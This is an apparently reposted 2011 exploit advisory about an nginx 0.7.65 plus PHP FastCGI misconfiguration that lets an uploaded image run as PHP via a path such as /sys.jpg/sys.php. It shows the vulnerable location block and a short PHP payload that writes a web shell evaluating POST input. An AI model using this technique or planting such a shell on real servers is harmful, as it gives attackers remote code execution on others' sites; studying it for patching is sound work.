Nginx 0.7.65 Shell Upload

2011.08.03
Credit: sysmox
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Nginx Server Configuration hole ; Upload file execute # Software link : http://nginx.org/ # Version : Confirmed in nginx v0.7.65. (And PHP v5.3.2 with Suhosin patch and extension). # Tested on : windows 7 # Date : 29/07/2011 # Author : sysmox.com # Website : http://www.sysmox.com # Email : info_at_sysmox.com Nginx project millions sites run it ; I also like it ; It has an excellent options ; Recently it became popularity about the volume of work and the develop the code . Nginx suffer from a widely flaw could lead a big damage and exploited by malicious hackers to gain access to infected system : If your configuration set up to nginx+php+cgi like : location ~ \.php$ { root html; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; include fastcgi_params; } If a user browse as an example Http://www.site.com/sys.php<http://www.site.com/sys.php> Link would be /sys.jpg/sys.php . SCRIPT_FILENAME would become /scripts/sys.jpg and PATH_INFO would become sys.php; Thats mean if some body uploaded a a jpg file and execute it as an php . The countenus of the jpg file can be like ?<?fputs(fopen(?shell.PHP?,?w? ),?<?eval(\$_POST[akt]);?>?)?>?


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top